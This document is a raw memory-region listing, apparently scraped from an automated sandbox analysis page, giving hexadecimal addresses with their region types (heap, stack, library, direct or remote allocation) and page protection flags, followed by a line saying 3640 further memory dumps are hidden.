page execute and write copy
5E8C000
heap
page read and write
E0B000
trusted library allocation
page execute and read and write
20D0000
heap
page read and write
FF000
unkown
page readonly
105C000
unkown
page execute and read and write
6511000
heap
page read and write
2AF80001000
trusted library allocation
page read and write
15B0000
heap
page read and write
2E31000
heap
page read and write
6104000
heap
page read and write
6124000
heap
page read and write
1234000
heap
page read and write
6795000
heap
page read and write
E85F07B000
stack
page read and write
65B0000
heap
page read and write
2F1E000
trusted library allocation
page read and write
2084000
heap
page read and write
30B000
unkown
page read and write
61C9000
heap
page read and write
2B74000
heap
page read and write
4689000
heap
page read and write
6297000
heap
page read and write
7D0000
heap
page read and write
1290000
direct allocation
page read and write
54C1000
heap
page read and write
2AF80179000
trusted library allocation
page read and write
517D000
heap
page read and write
6124000
heap
page read and write
665B000
heap
page read and write
47AB000
heap
page read and write
479B000
heap
page read and write
2F9D000
stack
page read and write
3671000
heap
page read and write
1BADE000
stack
page read and write
6542000
heap
page read and write
32B1000
heap
page read and write
460F000
heap
page read and write
140498000
unkown
page execute and write copy
18A0000
direct allocation
page read and write
2E31000
heap
page read and write
158C000
unkown
page execute read
1404AE000
unkown
page execute and write copy
5AAE000
stack
page read and write
57F0000
heap
page read and write
5290000
heap
page read and write
92A000
heap
page read and write
6274000
heap
page read and write
1234000
heap
page read and write
6200000
heap
page read and write
2B44000
heap
page read and write
617A000
heap
page read and write
1F51000
heap
page read and write
2F1A000
trusted library allocation
page read and write
664A000
heap
page read and write
2D87000
trusted library allocation
page read and write
419000
unkown
page write copy
7FF8491F0000
trusted library allocation
page read and write
1BFCF000
stack
page read and write
3470000
direct allocation
page read and write
14049C000
unkown
page execute and write copy
3671000
heap
page read and write
1078000
unkown
page execute and read and write
2B74000
heap
page read and write
465E000
heap
page read and write
26A2E640000
heap
page read and write
4681000
heap
page read and write
3671000
heap
page read and write
5E7D000
heap
page read and write
32B1000
heap
page read and write
2F37000
trusted library allocation
page read and write
7FF849098000
trusted library allocation
page read and write
3671000
heap
page read and write
2D6C000
trusted library allocation
page read and write
1E7F000
heap
page read and write
554000
heap
page read and write
5E7C000
heap
page read and write
463E000
heap
page read and write
646E000
stack
page read and write
40CD000
trusted library allocation
page read and write
50C1000
heap
page read and write
2E31000
heap
page read and write
63F4000
heap
page read and write
463C000
heap
page read and write
1E7F000
heap
page read and write
2AF80463000
trusted library allocation
page read and write
E85D7FB000
stack
page read and write
528D000
heap
page read and write
61A3000
heap
page read and write
32B1000
heap
page read and write
120E000
stack
page read and write
50C1000
heap
page read and write
64EF000
stack
page read and write
664A000
heap
page read and write
5E46000
heap
page read and write
3671000
heap
page read and write
1F0000
direct allocation
page read and write
6131000
heap
page read and write
140226000
unkown
page execute and read and write
61CA000
heap
page read and write
5F46000
heap
page read and write
9B000
stack
page read and write
61B4000
heap
page read and write
2E81000
heap
page read and write
2B65000
heap
page read and write
3AD1000
trusted library allocation
page read and write
1F50000
heap
page read and write
51EA000
heap
page execute and read and write
283C4000
heap
page read and write
1BC5000
heap
page read and write
12B3000
heap
page read and write
109000
unkown
page write copy
1017000
unkown
page execute and read and write
1EAF000
heap
page read and write
1BA8F000
stack
page read and write
400000
unkown
page readonly
7FF849269000
trusted library allocation
page read and write
2D53000
trusted library allocation
page read and write
465C000
heap
page read and write
CC4000
heap
page read and write
1675000
heap
page read and write
6127000
heap
page read and write
466E000
heap
page read and write
6129000
heap
page read and write
22375000
heap
page read and write
51F0000
heap
page read and write
6511000
heap
page read and write
5FE3000
heap
page read and write
63A0000
heap
page read and write
427000
unkown
page readonly
679E1000
unkown
page read and write
7FF849123000
trusted library allocation
page read and write
1360000
heap
page read and write
13D6A439000
heap
page read and write
5A6E000
stack
page read and write
6510000
heap
page read and write
324000
unkown
page readonly
618D000
heap
page read and write
2E31000
heap
page read and write
16AF000
stack
page read and write
A44000
unkown
page read and write
6131000
heap
page read and write
3671000
heap
page read and write
4656000
heap
page read and write
1650000
direct allocation
page read and write
1404B0000
unkown
page execute and write copy
56B000
heap
page read and write
401000
unkown
page execute read
32B1000
heap
page read and write
7FF849126000
trusted library allocation
page read and write
5BAF000
stack
page read and write
E85C7F3000
stack
page read and write
88E000
stack
page read and write
56A0000
trusted library allocation
page read and write
550000
heap
page read and write
40D000
unkown
page write copy
61B4000
heap
page read and write
60AE000
stack
page read and write
65BF000
heap
page read and write
2AF8014C000
trusted library allocation
page read and write
464E000
heap
page read and write
355E000
stack
page read and write
5113000
heap
page read and write
1140000
direct allocation
page read and write
2B88000
heap
page read and write
1F0000
direct allocation
page read and write
628A000
heap
page read and write
6104000
heap
page read and write
22345000
heap
page read and write
19F9000
unkown
page readonly
7FF849150000
trusted library allocation
page read and write
DDD000
trusted library allocation
page execute and read and write
466E000
heap
page read and write
E85E877000
stack
page read and write
6590000
trusted library allocation
page read and write
6648000
heap
page read and write
EED000
stack
page read and write
2B9C000
heap
page read and write
54C000
heap
page read and write
148F000
heap
page read and write
2B7D000
heap
page read and write
6CAF000
stack
page read and write
529C000
heap
page read and write
E10000
heap
page read and write
6181000
heap
page read and write
6510000
trusted library allocation
page read and write
532E000
stack
page read and write
6591000
heap
page read and write
53F000
heap
page read and write
2F5F000
trusted library allocation
page read and write
35EE000
stack
page read and write
464E000
heap
page read and write
140500000
unkown
page execute and write copy
4794000
heap
page read and write
525B000
heap
page read and write
357B000
heap
page read and write
40FD000
stack
page read and write
462A000
heap
page read and write
65D1000
heap
page read and write
6131000
heap
page read and write
5FAC000
heap
page read and write
478F000
heap
page read and write
67F0000
trusted library allocation
page read and write
55DD000
heap
page read and write
6119000
heap
page read and write
2B44000
heap
page read and write
1060000
unkown
page execute and read and write
4C7687C000
stack
page read and write
401000
unkown
page execute read
2235C000
heap
page read and write
65B0000
heap
page read and write
6532000
heap
page read and write
185DD202000
trusted library allocation
page read and write
5E6C000
heap
page read and write
3671000
heap
page read and write
60DC000
heap
page read and write
2B32000
trusted library allocation
page read and write
46C1000
heap
page read and write
E9A000
unkown
page readonly
4791000
heap
page read and write
356E000
stack
page read and write
6321000
heap
page read and write
65B0000
heap
page read and write
22365000
heap
page read and write
6536000
heap
page read and write
2CC000
unkown
page readonly
62B8000
heap
page read and write
475D000
heap
page read and write
1342D000
stack
page read and write
5FE8000
heap
page read and write
ED0000
trusted library allocation
page read and write
65B8000
heap
page read and write
2B91000
trusted library allocation
page read and write
6320000
heap
page read and write
400000
direct allocation
page read and write
5E89000
heap
page read and write
6283000
heap
page read and write
E7AE000
stack
page read and write
61D9000
heap
page read and write
46C2000
heap
page read and write
2B43000
heap
page read and write
2AFFB300000
trusted library allocation
page read and write
4656000
heap
page read and write
67B1000
heap
page read and write
479B000
heap
page read and write
32B1000
heap
page read and write
56D000
stack
page read and write
5B6F000
stack
page read and write
1290000
direct allocation
page read and write
34510000
trusted library allocation
page read and write
1F63000
heap
page read and write
5156000
trusted library allocation
page read and write
5E86000
heap
page read and write
22332000
heap
page read and write
6125000
heap
page read and write
6151000
heap
page read and write
3BDF000
stack
page read and write
61FE000
stack
page read and write
62B8000
heap
page read and write
60AE000
heap
page read and write
164F000
unkown
page readonly
4680000
heap
page read and write
1F0000
direct allocation
page read and write
61C9000
heap
page read and write
E8C000
unkown
page write copy
5713000
heap
page read and write
6510000
trusted library allocation
page read and write
6147000
heap
page read and write
9F8000
stack
page read and write
32B1000
heap
page read and write
F85000
heap
page read and write
1E48000
heap
page read and write
63DA000
heap
page read and write
65C1000
heap
page read and write
4689000
heap
page read and write
61C9000
heap
page read and write
2235E000
heap
page read and write
6192000
heap
page read and write
1ACF000
stack
page read and write
2DC5000
trusted library allocation
page read and write
83E000
unkown
page readonly
53F000
heap
page read and write
570000
heap
page read and write
62B8000
heap
page read and write
554000
heap
page read and write
2B90000
heap
page read and write
411000
unkown
page readonly
5E86000
heap
page read and write
204C000
direct allocation
page read and write
513B000
trusted library allocation
page read and write
4680000
heap
page read and write
65C3000
heap
page read and write
DD4000
trusted library allocation
page read and write
474D000
heap
page read and write
6710000
heap
page read and write
13AE000
heap
page read and write
51B0000
heap
page read and write
463F000
heap
page read and write
32B1000
heap
page read and write
50C000
heap
page read and write
3830000
trusted library allocation
page read and write
1029000
unkown
page execute and read and write
1290000
direct allocation
page read and write
6553000
heap
page read and write
50E0000
heap
page read and write
2235F000
heap
page read and write
3671000
heap
page read and write
4DEF000
stack
page read and write
2B90000
heap
page read and write
12E7000
heap
page read and write
380000
unkown
page readonly
2234D000
heap
page read and write
9B000
stack
page read and write
1BA7000
heap
page read and write
7FF849190000
trusted library allocation
page read and write
61D0000
trusted library allocation
page read and write
1234000
heap
page read and write
513E000
heap
page read and write
E97000
unkown
page readonly
1767000
heap
page read and write
61B4000
heap
page read and write
2B91000
heap
page read and write
561000
heap
page read and write
D6F000
stack
page read and write
400000
unkown
page readonly
16DA000
heap
page read and write
14026F000
unkown
page execute and read and write
478C000
heap
page read and write
4675000
heap
page read and write
22350000
heap
page read and write
4675000
heap
page read and write
61CA000
heap
page read and write
18DE000
heap
page read and write
1BC5000
heap
page read and write
EEB000
stack
page read and write
159EF000
stack
page read and write
2B69000
heap
page read and write
9CAE000
stack
page read and write
2235E000
heap
page read and write
2DD0000
remote allocation
page read and write
283E1000
heap
page read and write
613F000
heap
page read and write
382E000
stack
page read and write
3671000
heap
page read and write
1BA7000
heap
page read and write
651E000
stack
page read and write
56E6000
heap
page read and write
3EBE000
stack
page read and write
221F0000
heap
page read and write
4B11000
heap
page read and write
3671000
heap
page read and write
3671000
heap
page read and write
102A000
heap
page read and write
1EC0000
heap
page read and write
4689000
heap
page read and write
5F46000
heap
page read and write
2B88000
heap
page read and write
1404AA000
unkown
page execute and write copy
4680000
heap
page read and write
2B90000
heap
page read and write
550000
heap
page read and write
2F3A000
trusted library allocation
page read and write
140001000
unkown
page execute and read and write
419000
unkown
page write copy
393D000
stack
page read and write
1404B2000
unkown
page execute and write copy
45DE000
heap
page read and write
191E000
heap
page read and write
400000
unkown
page readonly
6090000
heap
page read and write
6790000
heap
page read and write
12F9000
stack
page read and write
2E7D000
trusted library allocation
page read and write
94E000
stack
page read and write
135B000
heap
page read and write
5359000
heap
page read and write
1136000
unkown
page write copy
66BB000
heap
page read and write
19FF000
unkown
page readonly
401000
unkown
page execute read
102F000
unkown
page execute and read and write
10C000
stack
page read and write
2E31000
heap
page read and write
1404A2000
unkown
page execute and write copy
3671000
heap
page read and write
62A2000
heap
page read and write
63E000
stack
page read and write
6124000
heap
page read and write
517F000
heap
page read and write
1073000
heap
page read and write
419C000
trusted library allocation
page read and write
145E000
heap
page read and write
28477000
heap
page read and write
1404FC000
unkown
page execute and write copy
60F5000
heap
page read and write
61E1000
heap
page read and write
67B1000
heap
page read and write
2B8D000
heap
page read and write
46C7000
heap
page read and write
1062000
unkown
page execute and read and write
52C000
heap
page read and write
521000
heap
page read and write
6281000
heap
page read and write
6125000
heap
page read and write
5E86000
heap
page read and write
1F0000
direct allocation
page read and write
140504000
unkown
page execute and write copy
4680000
heap
page read and write
2B99000
heap
page read and write
5E86000
heap
page read and write
2E31000
heap
page read and write
2B93000
heap
page read and write
34530000
heap
page read and write
5E57000
heap
page read and write
61C1000
heap
page read and write
6510000
trusted library allocation
page read and write
6119000
heap
page read and write
6520000
heap
page read and write
6535000
heap
page read and write
6EC000
unkown
page execute and read and write
2F59000
trusted library allocation
page read and write
2B65000
heap
page read and write
61E3000
heap
page read and write
F80000
heap
page read and write
19B8000
heap
page read and write
6463000
heap
page read and write
2AFFCAE0000
unkown
page readonly
47AD000
heap
page read and write
61EA000
heap
page read and write
401000
unkown
page execute and write copy
517D000
heap
page read and write
26A2E4E0000
heap
page read and write
6510000
trusted library allocation
page read and write
1290000
direct allocation
page read and write
61D9000
heap
page read and write
11B4000
heap
page read and write
2BE0000
heap
page execute and read and write
465F000
heap
page read and write
6181000
heap
page read and write
1E40000
heap
page read and write
38FF000
heap
page read and write
61B4000
heap
page read and write
2B40000
heap
page read and write
400000
unkown
page readonly
651A000
heap
page read and write
7ABC000
stack
page read and write
2CC000
unkown
page readonly
65B2000
heap
page read and write
5883000
heap
page read and write
1C180000
heap
page read and write
32B1000
heap
page read and write
462B000
heap
page read and write
11B4000
heap
page read and write
5568000
heap
page read and write
7FF880000000
direct allocation
page execute and read and write
3671000
heap
page read and write
468A000
heap
page read and write
2F5D000
trusted library allocation
page read and write
90C000
unkown
page execute read
C22D000
stack
page read and write
2D5000
unkown
page write copy
6534000
heap
page read and write
65BB000
heap
page read and write
22349000
heap
page read and write
1402A4000
unkown
page execute and write copy
6654000
heap
page read and write
FC5000
heap
page read and write
22341000
heap
page read and write
15E90000
heap
page read and write
2DD8000
trusted library allocation
page read and write
There are 3640 hidden memdumps, click here to show them.